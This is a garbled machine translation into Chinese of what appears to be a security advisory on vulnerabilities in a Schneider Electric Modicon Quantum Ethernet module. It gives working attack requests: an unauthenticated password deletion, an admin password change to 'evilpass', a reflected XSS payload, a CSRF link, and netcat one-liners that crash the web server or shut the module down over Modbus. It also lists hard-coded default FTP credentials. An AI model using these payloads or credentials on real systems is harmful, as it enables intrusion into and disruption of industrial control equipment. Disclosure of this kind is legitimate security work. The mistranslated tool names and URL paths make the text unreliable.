站得住脚的量子莫迪康发现多个漏洞在施耐德电气140年NOC 771年01以太网模块。
cve - 2018 - 7809:未经身份验证的密码重置
未经过身份验证的远程攻击者可以删除现有的HTTP服务器的用户名和密码通过访问以下网址:
http:// (ip) /不安全的嵌入式/内装式?提交=删除% 20密码
这也侧面影响到web服务器的用户名和密码的重置到默认用户/用户。
cve - 2018 - 7810: XSS反映出来
一个反映XSS漏洞存在于HTTP服务器的端点/ goform formTest。远程攻击者可以将Javascript插入的名字参数,将执行上下文中的链接后的人。一个例子:
http:// (ip) / goform / formTest ? name = <脚本> alert() < /脚本>
cve - 2018 - 7811:未经身份验证的密码更改
web服务器允许经过身份验证的远程用户通过改变自己的密码/安全/嵌入式/内置命令端点。web服务器还允许一个未经身份验证的远程攻击者通过改变用户的密码/不安全的嵌入式/内装式端点。一个示例URL更改管理用户的密码evilpass如下:
http:// (ip) /不安全的嵌入式/内装式?语言= English&user = admin&passwd = evilpass&cnfpasswd = evilpass&subhttppwd =保存+用户
cve - 2018 - 7830:未经身份验证的远程拒绝服务
一个拒绝服务时未经过身份验证的远程攻击者发送一个HTTP请求,没有“\ r \ n \ r \ n”终结者。这将使web服务器无用~ 1分钟下面是一行的概念:
echo - e " GET /索引。htm HTTP / 1.1 \ r \ nHost: 192.168.248.30”|数控192.168.248.30 80
cve - 2018 - 7831:跨站点请求伪造
密码更改的功能实现与HTTP GET请求中指定的新密码。一种防伪标记不需要验证请求。此外,当前密码不需要为了完成指定一个密码改变。攻击者可以打造一个链接被发送到一个经过验证的受害者。点击后,密码将被改变。示例URL:
http:// (ip) /安全/嵌入式/内装式?语言= English&user = admin&passwd = evilpass&cnfpasswd = evilpass&subhttppwd =保存+用户
其他人
施耐德电气站得住脚的七项报告。施耐德表示我们的一个漏洞(默认账户)是一个复制和其他(modbus拒绝服务)并不是一个弱点。然而,我们决定文档了。
默认FTP帐户
我们发现一些默认FTP帐户。我们需要使用一些密码VxHash碰撞披露收听距离摩尔在2010年。
| 用户名 |
密码 |
| sysdiag |
factorycast@schneider |
| fdrusers |
sresurdf |
| fwupgrade |
FaAmU5p2F ~ |
| 洛基 |
ZfTljublsx |
Modbus拒绝服务
Modbus / TCP端口502访问。站得住脚的发现以下未经身份验证的远程网络通讯协议消息将完全关闭以太网模块:
echo - ne " \ x0 \ xa8 \ x0 \ x0 \ x0 \ x5 \ x0 \ x5a \ x0 \ x7 \ x0”|数控192.168.238.30 502